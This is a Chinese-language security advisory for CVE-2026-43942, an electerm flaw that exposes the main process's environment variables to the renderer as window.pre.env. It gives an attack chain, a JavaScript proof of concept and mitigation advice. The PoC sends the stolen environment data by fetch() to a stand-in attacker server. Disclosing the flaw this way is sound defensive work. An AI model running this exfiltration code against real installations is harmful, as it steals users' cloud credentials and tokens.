CVE-2026-43942 electerm环境变量信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-43942

漏洞类型

信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

electerm

漏洞概述

electerm是一款开源的终端/SSH/SFTP客户端。在3.8.15及更早版本中，存在一个严重的信息泄露漏洞。漏洞源于`getConstants()` IPC处理程序直接将整个Node.js环境的`process.env`对象序列化并发送给渲染进程，存储在`window.pre.env`中。一旦攻击者在渲染进程中获得JavaScript执行权限（如通过DevTools或受损的webview上下文），即可读取并窃取其中的敏感凭证，导致云账户被劫持或供应链攻击。目前官方尚未发布补丁。

技术细节

该漏洞位于`src/app/lib/ipc-sync.js`文件中的`getConstants()`函数。在Electron应用架构中，主进程拥有系统级权限，而渲染进程应受限。受影响的electerm版本未对IPC通信数据进行过滤，直接将主进程的`process.env`对象序列化后传递给渲染进程。渲染进程将其存储在全局变量`window.pre.env`中。攻击者利用该漏洞的前提是必须在渲染进程中获得代码执行能力，这可以通过利用应用内的XSS漏洞、诱导用户在应用内加载恶意网页，或者物理接触打开DevTools控制台来实现。一旦获得执行权，攻击者只需遍历`window.pre.env`对象，即可提取AWS/GCP密钥、GitHub Token等高价值凭证，进而接管云资源或进行横向移动。

攻击链分析

STEP 1

初始访问

攻击者诱导用户在electerm中加载恶意内容，或获得对DevTools的访问权限。

STEP 2

代码执行

攻击者在渲染进程中执行任意JavaScript代码。

STEP 3

信息收集

脚本访问window.pre.env对象，读取序列化的process.env数据。

STEP 4

数据外泄

将窃取的敏感环境变量通过HTTP请求发送到攻击者控制的服务器。

STEP 5

影响扩大

利用窃取的凭证接管云账户，进行供应链攻击或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-43942
// Run this in the Electerm renderer process (e.g., DevTools Console)

function exploit() {
    // Access the exposed environment variables
    if (window.pre && window.pre.env) {
        console.log("[+] Vulnerability confirmed. Leaking environment variables...");
        
        // Exfiltrate data to a remote server controlled by the attacker
        const data = JSON.stringify(window.pre.env);
        
        fetch('https://attacker-controlled-server.com/exfil', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: data
        })
        .then(response => console.log("[+] Data successfully exfiltrated"))
        .catch(error => console.error("[-] Exfiltration failed", error));
    } else {
        console.log("[-] Target not vulnerable or window.pre.env is missing.");
    }
}

exploit();

影响范围

electerm <= 3.8.15

防御指南

临时缓解措施

由于目前暂无公开补丁，建议用户采取以下临时缓解措施：1. 避免在受影响版本的electerm中处理高敏感度的云服务凭证；2. 限制Electerm应用程序的网络访问权限，防止其向未知IP发送数据；3. 加强终端安全意识，不要在应用内打开不可信的链接或文件。